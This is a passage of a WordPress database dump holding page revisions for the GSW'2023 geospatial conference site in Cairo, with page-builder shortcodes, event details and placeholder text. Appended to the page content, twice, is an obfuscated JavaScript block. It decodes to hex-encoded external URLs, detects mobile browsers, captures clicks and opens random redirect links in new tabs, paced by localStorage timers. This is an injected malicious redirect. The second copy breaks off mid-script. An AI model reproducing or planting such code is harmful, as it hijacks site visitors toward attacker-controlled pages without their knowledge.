width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:28:33','2022-11-09 15:28:33','',3066,'https://gsw2023.com/?p=3140',0,'revision','',0),
(3141,1,'2022-11-09 15:29:32','2022-11-09 15:29:32','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_background_position=\"0% 50%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"2275\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1668007755864{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_inline_right\" css=\".vc_custom_1668007768687{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 